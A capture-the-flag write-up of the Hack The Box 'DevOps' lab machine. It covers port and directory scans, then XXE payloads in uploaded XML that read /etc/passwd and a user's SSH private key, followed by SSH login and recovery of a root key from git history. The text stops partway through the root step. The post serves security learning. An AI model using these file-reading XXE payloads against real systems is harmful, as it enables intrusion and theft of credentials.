Hack The Box: Devops write-up
Post
Cancel

# Hack The Box: DevOps machine write-up

This machine was quite interesting and not so difficult, as it was based on an XML external entity attack which lead to user and then just a basic .git inspection, which is similar to some CTF challenges I had previously done. Its ip is 10.10.10.91.

### Enumeration

As always, first of all I enumerate open ports to discover the services running in the machine. I ran the following:

1 nmap -sC -sV -oA nmap/initial 10.10.10.91 

And the result was:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 # Nmap 7.01 scan initiated Wed Sep 5 23:42:28 2018 as: nmap -sV -sC -oA nmap/initial 10.10.10.91 Nmap scan report for 10.10.10.91 Host is up (0.89s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA) |_ 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA) 5000/tcp open http Gunicorn 19.7.1 |_http-server-header: gunicorn/19.7.1 |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Sep 5 23:42:40 2018 -- 1 IP address (1 host up) scanned in 12.14 seconds 

So we find that there is a web server listening on port 5000, which is not the default port 80. Upon visiting the webpage, we get the following:

Initial message

Nothing to check, so I decide to run background recognition with dirb:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Sep 6 00:12:15 2018 URL_BASE: http://10.10.10.91:5000/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.91:5000/ ---- + http://10.10.10.91:5000/feed (CODE:200|SIZE:546263) + http://10.10.10.91:5000/upload (CODE:200|SIZE:347) ----------------- END_TIME: Thu Sep 6 00:22:05 2018 DOWNLOADED: 4612 - FOUND: 2 

Something interesting!

Looks like there is a test API to upload XML files… Definitely suspicious, we’re on the right track. The file needs to have three elements: Author, Subject and Content, so let’s craft a new XML file to test the functionality.

At first I uploaded this file:

><?xml version="1.0" encoding="UTF-8"?> <file> <Author>John, Doe</Author> <Subject>Hello</Subject> <Content>Computers</Content> </file>

Which resulted in the following output:

Output page

### Exploit

This reminded me of XXE, so I modified the file a bit to try to access the /etc/passwd file.

1 2 3 4 5 6 7 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <file> <Author>John, Doe</Author> <Subject>&xxe;</Subject> <Content>Computers</Content> </file> 

If this worked, the resulting page would list the contents of the file. Let’s see the output:

Output page (second test)

And indeed it works!

From there we can extract the following path: /home/roosa, which now we’re going to use to get the RSA private key used in the SSH service we saw before. The new file will thus be:

1 2 3 4 5 6 7 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa" >]> <file> <Author>John, Doe</Author> <Subject>&xxe;</Subject> <Content>Computers</Content> </file> 

And we get roosa’s private key. Then, we just log in through ssh with the following command: ssh -i roosa.key roosa@10.10.10.91 (we must remember to change file permissions to 600, otherwise this won’t work).

And we’re in an can read the hash in user.txt:

Getting user hash

### Root

Once logged in, we notice some interesting directories: deploy and work. I decide to have a look at them. It turned out deploy was just the webpage we saw earlier, but then I found something in work:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 roosa@gitter:~$ls -al work total 12 drwxrwxr-x 3 roosa roosa 4096 Mar 21 07:17 . drwxr-xr-x 22 roosa roosa 4096 May 29 10:32 .. drwxrwx--- 5 roosa roosa 4096 Mar 21 05:29 blogfeed roosa@gitter:~$ ls -al work/blogfeed total 28 drwxrwx--- 5 roosa roosa 4096 Mar 21 05:29 . drwxrwxr-x 3 roosa roosa 4096 Mar 21 07:17 .. drwxrwx--- 8 roosa roosa 4096 Mar 26 06:13 .git -rw-rw---- 1 roosa roosa 104 Mar 19 09:24 README.md drwxrwx--- 3 roosa roosa 4096 Mar 19 09:31 resources -rwxrw-r-- 1 roosa roosa 180 Mar 21 05:29 run-gunicorn.sh drwxrwx--- 2 roosa roosa 4096 Mar 26 06:43 src 

There is a git repo! That means we can check previous stages of the project.

git log output

I decide to go back to the second commit because it says that it contains the key for feed integration from tnerprise backend, which looks promising.

As we’re in a public environment with lots of people I won’t do git checkout {commit}, which would restore all files to that point in history for everyone. Instead, I used git diff {commit} to get the changes made between that commit and the one I’m on.

git diff output

Voilà! We just discovered that our roosa.key (highlighted in green) replaced a previous key (in red). Let’s recover it!

I didn’t know where to use it, but seeing it was an SSH key I decided to use it again, this time with root user: